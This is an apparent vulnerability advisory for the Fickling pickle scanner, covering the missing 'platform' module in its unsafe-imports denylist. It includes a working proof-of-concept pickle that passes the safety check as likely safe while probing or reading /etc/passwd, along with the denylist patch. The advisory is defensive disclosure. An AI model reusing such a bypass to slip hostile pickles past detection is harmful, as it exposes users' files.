PT-2026-27286 — Incomplete List of Disallowed Inputs in Pypi Fickling

PT-2026-27286 · Pypi · Fickling

Published

2026-03-13

Updated

2026-03-13

CVSS v4.0

6.9

Medium

Vector

AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N

Our assessment

We added platform to the blocklist of unsafe modules (https://github.com/trailofbits/fickling/commit/351ed4d4242b447c0ffd550bb66b40695f3f9975).

It was not possible to inject extra arguments to file without first monkey-patching platform. follow symlinks with the pickle, as it always returns an absolute path. We independently hardened it with https://github.com/trailofbits/fickling/commit/b9e690c5a57ee9cd341de947fc6151959f4ae359 to reduce the risk of obtaining direct module references while evading detection.

https://github.com/python/cpython/blob/6d1e9ceed3e70ebc39953f5ad4f20702ffa32119/Lib/platform.py#L687-L695

python

target = follow symlinks(target)
# "file" output is locale dependent: force the usage of the C locale
# to get deterministic behavior.
env = dict(os.environ, LC ALL='C')
try:
  # -b: do not prepend filenames to output lines (brief mode)
  output = subprocess.check output(['file', '-b', target],
                   stderr=subprocess.DEVNULL,
                   env=env)

Original report

Summary

A crafted pickle invoking platform. syscmd file, platform.architecture, or platform.libc ver passes check safety() with Severity.LIKELY SAFE and zero findings. During fickling.loads(), these functions invoke subprocess.check output with attacker-controlled arguments or read arbitrary files from disk.

Clarification: The subprocess call uses a list argument (['file', '-b', target]), not shell=True, so the attacker controls the file path argument to the file command, not the command itself. The impact is subprocess invocation with attacker-controlled arguments and information disclosure (file type probing), not arbitrary command injection.

Affected versions

<= 0.1.9 (verified on upstream HEAD as of 2026-03-04)

Non-duplication check against published Fickling GHSAs

No published advisory covers platform module false-negative bypass. This follows the same structural pattern as GHSA-5hwf-rc88-82xm (missing modules in UNSAFE IMPORTS) but covers a distinct set of functions.

Root cause

platform not in UNSAFE IMPORTS denylist.
OvertlyBadEvals skips calls imported from stdlib modules.
UnusedVariables heuristic neutralized by making call result appear used (SETITEMS path).

Reproduction (clean upstream)

python

from unittest.mock import patch
import fickling
import fickling.fickle as op
from fickling.fickle import Pickled
from fickling.analysis import check safety

pickled = Pickled([
  op.Proto.create(4),
  op.ShortBinUnicode('platform'),
  op.ShortBinUnicode(' syscmd file'),
  op.StackGlobal(),
  op.ShortBinUnicode('/etc/passwd'),
  op.TupleOne(),
  op.Reduce(),
  op.Memoize(),
  op.EmptyDict(),
  op.ShortBinUnicode('init'),
  op.ShortBinUnicode('x'),
  op.SetItem(),
  op.Mark(),
  op.ShortBinUnicode('trace'),
  op.BinGet(0),
  op.SetItems(),
  op.Stop(),
])

results = check safety(pickled)
print(results.severity.name, len(results.results)) # LIKELY SAFE 0

with patch('subprocess.check output', return value=b'ASCII text') as mock sub:
  fickling.loads(pickled.dumps())
  print('subprocess called?', mock sub.called)    # True
  print('args:', mock sub.call args[0])        # (['file', '-b', '/etc/passwd'],)

Additional affected functions (same pattern):

platform.architecture('/etc/passwd') — calls syscmd file internally
platform.libc ver('/etc/passwd') — opens and reads arbitrary file contents

Minimal patch diff

diff

--- a/fickling/fickle.py
+++ b/fickling/fickle.py
@@
+    "platform",

Validation after patch

Same PoC flips to LIKELY OVERTLY MALICIOUS
fickling.loads raises UnsafeFileError
subprocess.check output is not called

Impact

False-negative verdict: check safety() returns LIKELY SAFE with zero findings for a pickle that invokes a subprocess with attacker-controlled arguments.
Subprocess invocation: platform. syscmd file calls subprocess.check output(['file', '-b', target]) where target is attacker-controlled. The file command reads file headers and returns type information, enabling file existence and type probing.
File read: platform.libc ver opens and reads chunks of an attacker-specified file path.

Fix

Incomplete List of Disallowed Inputs

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-184

Related Identifiers

GHSA-5CXW-W2XG-2M8H

Affected Products

Fickling